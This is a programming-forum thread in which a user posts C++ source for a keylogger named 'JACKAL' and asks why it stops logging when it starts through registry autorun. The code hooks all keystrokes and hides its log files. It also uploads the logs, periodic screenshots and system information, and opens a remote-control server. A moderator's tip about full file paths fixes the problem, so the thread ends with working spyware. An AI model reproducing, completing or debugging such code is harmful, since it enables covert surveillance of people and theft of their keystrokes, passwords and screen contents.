Keylogger problem
CodeGuru Home VC++ / MFC / C++ .NET / C# Visual Basic VB Forums Developer.com
Results 1 to 4 of 4

Thread: Keylogger problem

  1. #1
    Join Date
    Jul 2013
    Posts
    3

    Keylogger problem

    I have the source code below,and it works perfect when i run it with double click.It captures keystrokes and makes screen shots for every 100 keystrokes + it can be controled remotely from another computer.
    The problem is that when it is added to registry by calling SetAutorunEnable("JACKAL",true) function,it starts and captures keystrokes and everything,but it doesn't write to "work.n6" file and it doesn't increment pressed and photo_contor values.And i dont know why! Please help! I know that something is wrong in KeyboardEvent or JACKAL but i dont know what.Everything else works just fine!


    #include "NZT.h"

    LRESULT WINAPI KeyboardEvent (int nCode, WPARAM wParam, LPARAM lParam)
    {
    f = fopen("work.n6","a+");
    wchar_t photo_name[MAX_PATH];
    char * use;
    LPWSTR convert;

    if ((nCode == HC_ACTION) && ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN)))
    {
    static int pressed = 0;
    static int photo_contor = 0;
    f = fopen("work.n6","a+");
    KBDLLHOOKSTRUCT hooked_key = *((KBDLLHOOKSTRUCT*)lParam);
    DWORD dwMsg = 1;
    dwMsg += hooked_key.scanCode << 0x10;
    dwMsg += hooked_key.flags << 0x18;
    char lpszKeyName[0x400] = {0};
    lpszKeyName[0] = '[';

    int i = GetKeyNameText(dwMsg, (lpszKeyName + 1),0xFF) + 1;
    int key = hooked_key.vkCode;
    lpszKeyName[i] = ']';
    //Gamma Border
    if (key >= 'A' && key <= 'Z')
    {
    if (GetAsyncKeyState(VK_SHIFT)>= 0) key += 0x20;
    if (f!=NULL)
    fprintf(f,"%c", key);
    pressed += 1;
    }
    else
    {
    if (f != NULL)
    fprintf(f,"%s", lpszKeyName);
    pressed += 1;
    }

    hide_file("work.n6");
    hide_file("data.n6");

    if (pressed > 100 /*&& connection_possible*/)
    {
    fclose(f);
    uploadFile("work.n6","work.txt");
    _itow(photo_contor,photo_name,0xA);
    convert = wcscat(photo_name,L".jpeg");
    ScreenShot(convert,50);
    use = wide_to_utf8(convert);
    uploadFile(use,use);
    hide_file(use);

    if (photo_contor > 0)
    {
    _itow(photo_contor - 1,photo_name,0xA);
    convert = wcscat(photo_name,L".jpeg");
    DeleteFile(wide_to_utf8(convert));
    }
    pressed = 0;
    photo_contor ++;
    }
    fclose(f);
    }
    return CallNextHookEx(hKeyboardHook,nCode,wParam,lParam);
    }

    DWORD WINAPI JACKAL(LPVOID lpParm)
    {
    HINSTANCE hins;
    hins = GetModuleHandle(NULL);
    hKeyboardHook = SetWindowsHookEx ( WH_KEYBOARD_LL, (HOOKPROC) KeyboardEvent, hins, 0);

    MSG message;
    while (GetMessage(&message,NULL,0,0))
    {
    TranslateMessage( &message );
    DispatchMessage( &message );
    }

    UnhookWindowsHookEx(hKeyboardHook);
    return 0;
    }

    void wmain()
    {
    //stealth();
    //disable_firewall_UAC();
    auto_hide();
    SetAutorunEnable("JACKAL",true);

    WSAStartup(0x0101,&wsdata);

    getComputerInfo();
    writeComputerInfo();
    uploadComputerInfo();

    tasks[0] = CreateThread( NULL, 0,
    (LPTHREAD_START_ROUTINE)createServer, NULL, 0, NULL);
    tasks[1] = CreateThread( NULL, 0,
    (LPTHREAD_START_ROUTINE)JACKAL,NULL, 0, NULL);
    WaitForMultipleObjects(2, tasks, TRUE, INFINITE );

    WSACleanup();
    }

  2. #2
    VictorN's Avatar
    VictorN is online now Super Moderator Power Poster
    Join Date
    Jan 2003
    Location
    Wallisellen (ZH), Switzerland
    Posts
    17,353

    Re: Keylogger problem

    You have to always use full path names rather than the local ones.
    Victor Nijegorodov

  3. #3
    Join Date
    Jul 2013
    Posts
    3

    Re: Keylogger problem

    Yes VictorN,i will take that into consideration.Thanks!

  4. #4
    Join Date
    Jul 2013
    Posts
    3

    Re: Keylogger problem

    Man you are a genius! It works thanks!
    I've replaced "work.n6" with the full filename path!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  


Azure Activities Information Page

Windows Mobile Development Center


Click Here to Expand Forum to Full Width

This is a CodeGuru survey question.


Featured


HTML5 Development Center